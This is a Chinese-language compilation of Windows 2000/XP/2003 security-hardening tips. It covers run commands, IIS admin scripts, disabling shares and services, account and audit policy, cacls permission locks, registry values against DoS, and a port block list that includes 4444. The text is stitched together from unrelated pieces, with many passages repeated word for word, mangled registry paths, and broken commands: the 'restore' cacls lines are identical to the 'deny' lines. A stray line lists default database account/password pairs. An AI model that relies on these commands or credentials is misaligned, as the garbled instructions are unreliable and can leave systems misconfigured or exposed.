安全策略摘录
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
以帮助管理任务的执行。本文中,这些任务划分为三个独立的任务组;不过,所有任务都是由驱动器盘符:/Inetpub/AdminScripts 文件夹中 Administrator 组的组成员用户执行的。
备注:要打开命令提示符以执行本文介绍的任何任务,请按下列步骤操作:
1、开始;
单击【开始】菜单—【运行】,键入“cmd”,然后单击确定。键入 cd Inetpub/AdminScripts 然后按 ENTER。
2、显示任务;
可用来显示任务的两个命令是 findweb 和 disptree。另一个可用来显示树中某一特定管理节点中的相关域的命令是 dispnode。
3、查找虚拟 Web 站点;
要查找虚拟 Web 站点,请在命令提示符下键入以下命令:
findweb -c _blank>计算机名 www.域名.com
4、显示管理树;
要显示管理树,可在命令提示符下键入下列两个命令之一:
disptree -a IIS://_blank>计算机名
或者
disptree -a IIS://本地主机/w3svc -n
5、创建任务;
可用于创建任务的两个命令是 mkw3site 和 mkwebdir。不过,adsutil 命令行实用程序中包含几个设计用来创建进程内应用程序的命令。
6、创建虚拟 Web 站点;
要创建虚拟 Web 站点,请在命令提示符下键入以下命令:
Mkw3site -r 根目录 驱动器盘符:/文件夹名 -t 新_blank>服务器名 -h 主机名 www.我的新 Web 站点.com
7、创建虚拟 Web 目录;
要创建虚拟 Web 目录,请在命令提示符下键入下面的命令:
Mkwebdir -c _blank>计算机名 -w "Web 站点名" -v 目录名, 驱动器盘符:/文件夹名
或者
Mkwebdir -c 本地主机 -w "Web 站点名" -v 目录名,驱动器盘符:/文件夹名
8、管理任务;
有几个管理命令可用来执行从启动和停止_blank>服务到更改访问属性等各种任务。本文只为两个管理命令提供了分步指南,而下面列出了其他所有命令:
chaccess
contftp
contsrv
contweb
dispnode
disptree
findweb
mkw3site
mkwebdir
pauseftp
pausesrv
pauseweb
startftp
startsrv
startweb
stopftp
stopsrv
stopweb
synciwam
9、在不中断整个 Web _blank>服务的情况下停止虚拟站点;
如想在不中断整个 Web _blank>服务的情况下停止虚拟站点,请从命令提示符下键入下面的命令:
adsutil STOP_blank>_SERVER W3SVC/_blank>服务器号
在本例中,对于 W3SVC/_blank>服务器号,可以键入 W3SVC/1 代表默认_blank>服务器,或者键入 W3SVC/2 代表 foobar _blank>服务器。
10、在不中断整个 Web _blank>服务的情况下启动虚拟站点;
如想在不中断整个 Web _blank>服务的情况下启动虚拟站点,请从命令提示符下键入下面的命令:
adsutil START_blank>_SERVER W3SVC/_blank>服务器号
在本例中,对于 W3SVC/_blank>服务器号,可以键入 W3SVC/1 代表默认_blank>服务器,或者键入 W3SVC/2 代表 foobar _blank>服务器。
疑难解答:
在创建 Virtual Web Directory(虚拟 Web 目录)之前必须为该目录创建文件夹;进程不自动创建此文件夹。如果在创建文件夹之前创建目录,就会收到一条错误消息。
您可以在"Internet Information _blank>服务"控制台检查您在命令提示符下执行的所有进程。如果在命令行进行更改时控制台打开着,则请单击操作,然后单击刷新以在控制台查看这些更改
sys change_on_install ihifk025
system manager ihisksks
本文并非本人所著适用于Windows 2000以上版本.本文所涉及到的实验在Windwos 2003下通过)
---------------
【一、禁止默认共享 】
1.先察看本地共享资源
运行-cmd-输入net share
2.删除共享(每次输入一个)
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3.删除ipc$空连接
在运行内输入regedit
在注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA
项里数值名称RestrictAnonymous的数值数据由0改为1.
4.关闭自己的139端口,ipc和RPC漏洞存在于此.
关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”
属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关
闭了139端口,禁止RPC漏洞.
----------------------------------------
【二、设置服务项,做好内部防御】
-------------------
A计划.服务策略:
控制面板→管理工具→服务
关闭以下服务:
1.Alerter[通知选定的用户和计算机管理警报]
2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]
3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享
4.Distributed Link Tracking Server[适用局域网分布式链接跟踪客户端服务]
5.Human Interface Device Access[启用对人体学接口设备(HID)的通用输入访问]
6.IMAPI CD-Burning COM Service[管理 CD 录制]
7.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]
8.Kerberos Key Distribution Center[授权协议登录网络]
9.License Logging[监视IIS和SQL如果你没安装IIS和SQL的话就停止]
10.Messenger[警报]
11.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]
12.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]
13.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]
14.Print Spooler[打印机服务,没有打印机就禁止吧]
15.Remote Desktop Help Session Manager[管理并控制远程协助]
16.Remote Registry[使远程计算机用户修改本地注册表]
17.Routing and Remote Access[在局域网和广域往提供路由服务.***理由路由服务刺探注册信息]
18.Server[支持此计算机通过网络的文件、打印、和命名管道共享]
19.Special Administration Console Helper[允许管理员使用紧急管理服务远程访问命令行提示符]
20.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持
而使用户能够共享文件、打印和登录到网络]
21.Telnet[允许远程用户登录到此计算机并运行程序]
22.Terminal Services[允许用户以交互方式连接到远程计算机]
23.Windows Image Acquisition (WIA)[照相服务,应用与数码摄象机]
2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]
3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享
4.Distributed Link Tracking Server[适用局域网分布式链接跟踪客户端服务]
5.Human Interface Device Access[启用对人体学接口设备(HID)的通用输入访问]
6.IMAPI CD-Burning COM Service[管理 CD 录制]
7.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]
8.Kerberos Key Distribution Center[授权协议登录网络]
9.License Logging[监视IIS和SQL如果你没安装IIS和SQL的话就停止]
10.Messenger[警报]
11.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]
12.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]
13.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]
14.Print Spooler[打印机服务,没有打印机就禁止吧]
15.Remote Desktop Help Session Manager[管理并控制远程协助]
16.Remote Registry[使远程计算机用户修改本地注册表]
17.Routing and Remote Access[在局域网和广域往提供路由服务.***理由路由服务刺探注册信息]
18.Server[支持此计算机通过网络的文件、打印、和命名管道共享]
19.Special Administration Console Helper[允许管理员使用紧急管理服务远程访问命令行提示符]
20.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持
而使用户能够共享文件、打印和登录到网络]
21.Telnet[允许远程用户登录到此计算机并运行程序]
22.Terminal Services[允许用户以交互方式连接到远程计算机]
23.Windows Image Acquisition (WIA)[照相服务,应用与数码摄象机]
-------------------
B计划.帐号策略:
一.打开管理工具.本地安全设置.密码策略
一.打开管理工具.本地安全设置.密码策略
1.密码必须符合复杂要求性.启用
2.密码最小值.我设置的是10
3.密码最长使用期限.我是默认设置42天
4.密码最短使用期限0天
5.强制密码历史 记住0个密码
6.用可还原的加密来存储密码 禁用
-------------------
C计划.本地策略:
打开管理工具
找到本地安全设置.本地策略.审核策略
1.审核策略更改 成功失败
2.审核登陆事件 成功失败
3.审核对象访问 失败
4.审核跟踪过程 无审核
5.审核目录服务访问 失败
6.审核特权使用 失败
7.审核系统事件 成功失败
8.审核帐户登陆时间 成功失败
9.审核帐户管理 成功失败
然后再到管理工具找到
事件查看器
应用程序 右键 属性 设置日志大小上限 我设置了512000KB 选择不覆盖事件
安全性 右键 属性 设置日志大小上限 我也是设置了512000KB 选择不覆盖事件
系统 右键 属性 设置日志大小上限 我都是设置了512000KB 选择不覆盖事件
-------------------
D计划.安全策略:
打开管理工具
找到本地安全设置.本地策略.安全选项
1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,启用比较好,但是我个人是不需要直接输入密码登陆的]
2.网络访问.不允许SAM帐户的匿名枚举 启用
3.网络访问.可匿名的共享 将后面的值删除
4.网络访问.可匿名的命名管道 将后面的值删除
5.网络访问.可远程访问的注册表路径 将后面的值删除
6.网络访问.可远程访问的注册表的子路径 将后面的值删除
7.网络访问.限制匿名访问命名管道和共享
8.帐户.重命名来宾帐户guest [最好写一个自己能记住中文名]让***去猜解guest吧,而且还得删除这个帐户,后面有详细解释]
9.帐户.重命名系统管理员帐户[建议取中文名]
-------------------
E计划.用户权限分配策略:
打开管理工具
找到本地安全设置.本地策略.用户权限分配
1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID
2.从远程系统强制关机,Admin帐户也删除,一个都不留
3.拒绝从网络访问这台计算机 将ID删除
4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务
5.通过终端允许登陆 删除Remote Desktop Users
---------------------
F计划.终端服务配置
打开管理工具
终端服务配置
1.打开后,点连接,右键,属性,远程控制,点不允许远程控制
2.常规,加密级别,高,在使用标准windows验证上点√!
3.网卡,将最多连接数上设置为0
4.高级,将里面的权限也删除.[我没设置]
再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话
2.常规,加密级别,高,在使用标准windows验证上点√!
3.网卡,将最多连接数上设置为0
4.高级,将里面的权限也删除.[我没设置]
再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话
---------------------
G计划.用户和组策略
打开管理工具
计算机管理.本地用户和组.用户
删除Support_388945a0用户等等
只留下你更改好名字的adminisrator权限
删除Support_388945a0用户等等
只留下你更改好名字的adminisrator权限
计算机管理.本地用户和组.组
组.我们就不组了.分经验的(不管他.默认设置)
组.我们就不组了.分经验的(不管他.默认设置)
---------------------
X计划.DIY策略[根据个人需要]
1.当登陆时间用完时自动注销用户(本地) 防止***密码***.
2.登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧.
3.对匿名连接的额外限制
4.禁止按 alt+crtl+del
5.允许在未登陆前关机[防止远程关机/启动、强制关机/启动]
6.只有本地登陆用户才能访问cd-rom
7.只有本地登陆用户才能访问软驱
8.取消关机原因的提示
1、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签页面;
2、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确定”按钮,来退出设置框;
3、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能键,来实现快速关机和开机;
4、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。
9.禁止关机事件跟踪
开始“Start ->”运行“ Run ->输入”gpedit.msc “,在出现的窗口的左边部分,
选择 ”计算机配置“(Computer Configuration )-> ”管理模板“
(Administrative Templates)-> ”系统“(System),在右边窗口双击
“Shutdown Event Tracker” 在出现的对话框中选择“禁止”(Disabled),
点击然后“确定”(OK)保存后退出这样,你将看到类似于windows 2000的关机窗口
1.当登陆时间用完时自动注销用户(本地) 防止***密码***.
2.登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧.
3.对匿名连接的额外限制
4.禁止按 alt+crtl+del
5.允许在未登陆前关机[防止远程关机/启动、强制关机/启动]
6.只有本地登陆用户才能访问cd-rom
7.只有本地登陆用户才能访问软驱
8.取消关机原因的提示
1、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签页面;
2、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确定”按钮,来退出设置框;
3、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能键,来实现快速关机和开机;
4、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。
9.禁止关机事件跟踪
开始“Start ->”运行“ Run ->输入”gpedit.msc “,在出现的窗口的左边部分,
选择 ”计算机配置“(Computer Configuration )-> ”管理模板“
(Administrative Templates)-> ”系统“(System),在右边窗口双击
“Shutdown Event Tracker” 在出现的对话框中选择“禁止”(Disabled),
点击然后“确定”(OK)保存后退出这样,你将看到类似于windows 2000的关机窗口
----------------------------------------
【三、修改权限防止病毒或***等破坏系统】
winxp、windows2003以上版本适合本方法.
因为目前的***抑或是病毒都喜欢驻留在system32目录下,如果我们用命令限制system32的写入和修改权限的话
那么,它们就没有办法写在里面了.看命令
那么,它们就没有办法写在里面了.看命令
---------------------
A命令
cacls C:windowssystem32 /G administrator:R 禁止修改、写入C:windowssystem32目录
cacls C:windowssystem32 /G administrator:F 恢复修改、写入C:windowssystem32目录
呵呵,这样病毒等就进不去了,如果你觉得这个还不够安全,
还可以进行修改觉得其他危险目录,比如直接修改C盘的权限,但修改c修改、写入后,安装软件时需先把权限恢复过来才行
---------------------
B命令
cacls C: /G administrator:R 禁止修改、写入C盘
cacls C: /G administrator:F 恢复修改、写入C盘
cacls C: /G administrator:F 恢复修改、写入C盘
这个方法防止病毒,
如果您觉得一些病毒防火墙消耗内存太大的话
此方法稍可解决一点希望大家喜欢这个方法^_^
如果您觉得一些病毒防火墙消耗内存太大的话
此方法稍可解决一点希望大家喜欢这个方法^_^
---------------------
X命令
以下命令推荐给高级管理员使用[因为win版本不同,请自行修改参数]
cacls %SystemRoot%system32cmd.exe /E /D IUSR_ComSpec 禁止网络用户、本地用户在命令行和gui下使用cmd
cacls %SystemRoot%system32cmd.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用cmd
cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 禁止网络用户、本地用户在命令行和gui下使用tftp.exe
cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用tftp.exe
cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 禁止网络用户、本地用户在命令行和gui下使用tftp32.exe
cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用tftp32.exe
----------------------------------------
【四、重要文件名加密[NTFS格式]】
此命令的用途可加密windows的密码档,QQ密码档等等^.^
命令行方式
加密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /e 文件名(或文件夹名)”。
解密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /d 文件名(或文件夹名)”。
加密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /e 文件名(或文件夹名)”。
解密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /d 文件名(或文件夹名)”。
----------------------------------------
【五、修改注册表防御D.D.O.S】
在注册表HKLMSYSTEMCurrentControlSetServicesTcpipParameters中更改以下值可以帮助你防御一定强度的DoS***
SynAttackProtect REG_DWORD 2
EnablePMTUDiscovery REG_DWORD 0
NoNameReleaseOnDemand REG_DWORD 1
EnableDeadGWDetect REG_DWORD 0
KeepAliveTime REG_DWORD 300,000
PerformRouterDiscovery REG_DWORD 0
EnableICMPRedirects REG_DWORD 0
更多新的防御技巧请搜索其他信息,
由于本人不敢拿自己的硬盘开玩笑,所以没做实验... ...
----------------------------------------
【六、打造更安全的防火墙】
只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放,
***就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。 本人现将自己所知道的端口公布如下(如果觉得还有危险需要过滤的,请联系本人:OICQ 250875628
端口 协议 应用程序
21 TCP FTP
25 TCP SMTP
53 TCP DNS
80 TCP HTTP SERVER
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
6(非端口) IP协议
8(非端口) IP协议
那么,我们根据自己的经验,将下面的端口关闭
TCP
21
22
23
25 TCP SMTP
53 TCP DNS
80
135 epmap
138 [冲击波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
3389
4444[冲击波]
4489
UDP
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
关于UDP一般只有腾讯OICQ会打开4000或者是8000端口,那么,我们只运行本机使用4000端口就行了
----------------------------------------
【七、保护个人隐私】
1、TT浏览器
选择用另外一款浏览器浏览网站.我推荐用TT,使用TT是有道理的.
TT可以识别网页中的脚本,JAVA程序,可以很好的抵御一些恶意的脚本等等,而且TT即使被感染,你删除掉又重新安装一个就是.[TT就是腾讯的浏览器](不过有些人喜欢用MyIE,因为我使用的时间和对他的了解不是很深吧,感觉不出他对安全方面有什么优势一_一~,希望支持MyIE的朋友不要揍我,否则我会哭... ...)
2、移动“我的文档”
进入资源管理器,右击“我的文档”,选择“属性”,在“目标文件夹”选项卡中点“移动”按钮,
选择目标盘后按“确定”即可。在Windows 2003中“我的文档”已难觅芳踪,桌面、开始等处都看不到了,
建议经常使用的朋友做个快捷方式放到桌面上。
进入资源管理器,右击“我的文档”,选择“属性”,在“目标文件夹”选项卡中点“移动”按钮,
选择目标盘后按“确定”即可。在Windows 2003中“我的文档”已难觅芳踪,桌面、开始等处都看不到了,
建议经常使用的朋友做个快捷方式放到桌面上。
3、移动IE临时文件
进入“开始→控制面板→Internet 选项”,在“常规”选项卡的“Internet 文件”栏里点“设置”按钮,
在弹出窗体中点“移动文件夹”按钮,选择目标文件夹后,点“确定”,在弹出对话框中选择“是”,
系统会自动重新登录。点本地连接,高级,安全日志,把日志的目录更改专门分配日志的目录,
不建议是C:再重新分配日志存储值的大小,我是设置了10000KB
进入“开始→控制面板→Internet 选项”,在“常规”选项卡的“Internet 文件”栏里点“设置”按钮,
在弹出窗体中点“移动文件夹”按钮,选择目标文件夹后,点“确定”,在弹出对话框中选择“是”,
系统会自动重新登录。点本地连接,高级,安全日志,把日志的目录更改专门分配日志的目录,
不建议是C:再重新分配日志存储值的大小,我是设置了10000KB
----------------------------------------
【八、第三方软件的帮助】
防火墙:天网防火墙(建议)[二道贩子注:winxp以上可以考虑用系统自带的防火墙,win2000可以考虑用IPSEC,是个锻炼的机会)
杀毒软件:卡巴斯基
二道贩子后注:
现在***的***有从传统的系统漏洞转向了你的浏览器,所以要在升级一些传统漏洞补丁的同时要注意你的浏览器.
----------------------------------------
【声明】
根据windows2003的版本不同,有时可以自己调整一下顺序,已经午夜两点了,希望大家能早点休息,毕竟生命的意义不在网络,而是让网络体现出你人生价值观!
敬请关注下章(打造更安全的服务器)联系OICQ:250875628
胸毛上的思想.
让他迎向我的刺刀.
雄鹰的利爪.
从不畏惧敌人的指甲刀
不自强就会被欺负
就像调戏良家妇女一样
win2K安全注意要点(全)
本站评论:这篇本来是整理提交给私服管理员的安全配置篇。现在发在这里,大家可以参考
WIN2K服务器如果大家是就近才买的光盘,应该注意到了安装后默认都是关闭了GUEST帐号的,如果没有关闭该帐号的朋友请在控制面板管理工具,计算机管理中的用户那里进行永久禁用处理.现在去打上SP4,后门漏洞应该关闭的差不多了,注意开机一定要设定一个密码,最好让WIN2K使用自动升级功能,实现无人管理.
如果你的系统上安装了SQL,一定要屏蔽了3389端口.
私服安全现在已经做的差不多了.现在应该做的是一定把防火墙安装起,如果有条件可以把LockDown给他安装起.他可以有效的制止******程序运行起作用.
屏蔽端口文章:
用win2000的IP安全策略封闭端口的办法
封锁端口,全面构建防线
用win2000的IP安全策略封闭端口的办法
封锁端口,全面构建防线
***大多通过端口进行***,所以你的服务器只能开放你需要的端口,那么你需要哪些端口呢?以下是常用端口,你可根据需要取舍:
80为Web网站服务;21为FTP服务;25 为E-mail SMTP服务;110为Email POP3服务。
其他还有SQL Server的端口1433等,你可到网上查找相关资料。那些不用的端口一定要关闭!关闭这些端口,我们可以通过Windows 2000的安全策略进行。
借助它的安全策略,完全可以阻止***者的***。你可以通过“管理工具→本地安全策略”进入,右击“IP安全策略”,选择“创建IP安全策略”,点[下一步]。输入安全策略的名称,点[下一步],一直到完成,你就创建了一个安全策略:
借助它的安全策略,完全可以阻止***者的***。你可以通过“管理工具→本地安全策略”进入,右击“IP安全策略”,选择“创建IP安全策略”,点[下一步]。输入安全策略的名称,点[下一步],一直到完成,你就创建了一个安全策略:
接着你要做的是右击“IP安全策略”,进入管理IP筛选器和筛选器操作,在管理IP筛选器列表中,你可以添加要封锁的端口,这里以关闭ICMP和139端口为例说明。
关闭了ICMP,***软件如果没有强制扫描功能就不能扫描到你的机器,也Ping不到你的机器。关闭ICMP的具体操作如下:点[添加],然后在名称中输入“关闭ICMP”,点右边的[添加],再点[下一步]。在源地址中选“任何IP地址”,点[下一步]。在目标地址中选择“我的IP地址”,点[下一步]。在协议中选择“ICMP”,点[下一步]。回到关闭ICMP属性窗口,即关闭了ICMP。
下面我们再设置关闭139,同样在管理IP筛选器列表中点“添加”,名称设置为“关闭139”,点右边的“添加”,点[下一步]。在源地址中选择“任何IP地址”,点[下一步]。在目标地址中选择“我的IP地址”,点[下一步]。在协议中选择“TCP”,点[下一步]。在设置IP协议端口中选择从任意端口到此端口,在此端口中输入139,点[下一步]。即完成关闭139端口,其他的端口也同样设置
然后进入设置管理筛选器操作,点“添加”,点[下一步],在名称中输入“拒绝”,点[下一步]。选择“阻止”,点[下一步]。
然后关闭该属性页,右击新建的IP安全策略“安全”,打开属性页。在规则中选择“添加”,点[下一步]。选择“此规则不指定隧道”,点[下一步]。在选择网络类型中选择“所有网络连接”,点[下一步]。在IP筛选器列表中选择“关闭ICMP”,点[下一步]。在筛选器操作中选择“拒绝”,点[下一步]。这样你就将“关闭ICMP”的筛选器加入到名为“安全”的IP安全策略中。同样的方法,你可以将“关闭139”等其他筛选器加入进来。
最后要做的是指派该策略,只有指派后,它才起作用。方法是右击“安全”,在菜单中选择“所有任务”,选择“指派”。IP安全设置到此结束,你可根据自己的情况,设置相应的策略。
windows2000服务安全与建议
Alerter
服务方向: 负责向用户通报管理警报,该服务和Mesenger服务一起工作,后者接收并路由前者的信息.
可执行文件: %systemRoot%/system32/services.exe
风险: 潜在可能导致社会工程***
建议: 将Alerter服务发出的警告限定为只由管理员接收.
Application Management
服务方向: 提供和active directory之间的通信.通过group policy(组策划)来指定,发布并删除在系统中安装的应用程序.
可执行文件: winnt/system32/services.exe
风险: 无
建议: 非组策略使用应用程序,最好禁用该服务.
Alerter
服务方向: 负责向用户通报管理警报,该服务和Mesenger服务一起工作,后者接收并路由前者的信息.
可执行文件: %systemRoot%/system32/services.exe
风险: 潜在可能导致社会工程***
建议: 将Alerter服务发出的警告限定为只由管理员接收.
Application Management
服务方向: 提供和active directory之间的通信.通过group policy(组策划)来指定,发布并删除在系统中安装的应用程序.
可执行文件: winnt/system32/services.exe
风险: 无
建议: 非组策略使用应用程序,最好禁用该服务.
Boot Information Negotiation Layer
服务方向: 与Remote Installation Service(RIS)一起使用,除有需要通过RIS安装操作系统,否则不要运行.
可执行文件: winnt/system32/services.exe
风险: 无
服务方向: 与Remote Installation Service(RIS)一起使用,除有需要通过RIS安装操作系统,否则不要运行.
可执行文件: winnt/system32/services.exe
风险: 无
Brower
服务方向: 负责保存网络上的计算机列表,并将该列表提供给那些请求得到该列表的程序
可执行文件: winnt/system32/services.exe
风险: 暴露有关网络的信息
建议: 禁止
服务方向: 负责保存网络上的计算机列表,并将该列表提供给那些请求得到该列表的程序
可执行文件: winnt/system32/services.exe
风险: 暴露有关网络的信息
建议: 禁止
Indexing
服务方向: 负责索引磁盘上的文档和文档属性,并且在一个目录中保存信息,使得你在以后可以搜索他们.
可执行文件: winnt/system32/services.exe
风险: 其为IISweb服务器上诸多安全弱点的根源
建议: 除非特别需要,否则禁止.
服务方向: 负责索引磁盘上的文档和文档属性,并且在一个目录中保存信息,使得你在以后可以搜索他们.
可执行文件: winnt/system32/services.exe
风险: 其为IISweb服务器上诸多安全弱点的根源
建议: 除非特别需要,否则禁止.
ClipBook
服务方向: ClipBook支持ClipBook Viewer程序,该程序可以允许剪贴页被远程计算机上的ClipBook浏览.可以使得用户能够通过网络连接来剪切和粘贴文本和图形.
可执行文件: winnt/system32/Clipsrv.exe
风险: 潜在被非法用于远程访问ClipBook剪贴页面
建议: 禁止
服务方向: ClipBook支持ClipBook Viewer程序,该程序可以允许剪贴页被远程计算机上的ClipBook浏览.可以使得用户能够通过网络连接来剪切和粘贴文本和图形.
可执行文件: winnt/system32/Clipsrv.exe
风险: 潜在被非法用于远程访问ClipBook剪贴页面
建议: 禁止
Distributed File System
服务方向: 允许创建单一逻辑盘.文件分布在网络上不同位置.
可执行文件: winnt/system32/Df***c.exe
风险: 暂无已知风险
建议: 禁止(会产生disk error,可忽略该错误)
服务方向: 允许创建单一逻辑盘.文件分布在网络上不同位置.
可执行文件: winnt/system32/Df***c.exe
风险: 暂无已知风险
建议: 禁止(会产生disk error,可忽略该错误)
DHCP client
服务方向: 通过注册和更新IP地址和DNS域名来管理网络配置.
可执行文件: winnt/system32/services.exe
风险: 无已知风险
建议:为服务器分配一个静态IP
服务方向: 通过注册和更新IP地址和DNS域名来管理网络配置.
可执行文件: winnt/system32/services.exe
风险: 无已知风险
建议:为服务器分配一个静态IP
Logical Disk Manager Administrative
服务方向: 用于管理逻辑盘
可执行文件: winnt/system32/dmadmin.exe
风险: 暂无已知风险
建议:将服务的启动类型设为手动(Manual)
服务方向: 用于管理逻辑盘
可执行文件: winnt/system32/dmadmin.exe
风险: 暂无已知风险
建议:将服务的启动类型设为手动(Manual)
Logical Disk Manager
服务方向: 该服务为 Logical Disk Manager Watchdog 服务.负责管理动态磁盘的服务.
可执行文件: winnt/system32/services.exe
风险: 无已知风险
建议: 系统运行时需要,保持默认得自动启动
服务方向: 该服务为 Logical Disk Manager Watchdog 服务.负责管理动态磁盘的服务.
可执行文件: winnt/system32/services.exe
风险: 无已知风险
建议: 系统运行时需要,保持默认得自动启动
DNS Server
服务方向: 负责解答DNS域名查询
可执行文件: winnt/system32/dns.exe
风险: 无已知风险
建议: 因其通常是导致许多安全性弱点的根源,该服务应谨慎使用.
服务方向: 负责解答DNS域名查询
可执行文件: winnt/system32/dns.exe
风险: 无已知风险
建议: 因其通常是导致许多安全性弱点的根源,该服务应谨慎使用.
DNS Client
服务方向: 用于缓存DNS查询来进行记录.可用于某个***检测系统的DNS查询,可加速DNS查询的速度.
可执行文件: winnt/system32/services.exe
风险: 无已知风险,但***者可以查看你的缓存内容.确定你所访问过的网站. 命令行形式为(ipconfig/displaydns)
建议:可停可不停
服务方向: 用于缓存DNS查询来进行记录.可用于某个***检测系统的DNS查询,可加速DNS查询的速度.
可执行文件: winnt/system32/services.exe
风险: 无已知风险,但***者可以查看你的缓存内容.确定你所访问过的网站. 命令行形式为(ipconfig/displaydns)
建议:可停可不停
Event Log
服务方向:Event Log服务负责记录来自系统和运行中程序的管理事件消息.虽然该服务功能有限,并具有一些小问题,但是该服务可以用于***检测和系统监视.
可执行文件: winnt/system32/services.exe
风险: 无已知风险
建议: 该服务应该被启动,尤其实在独立服务器上.
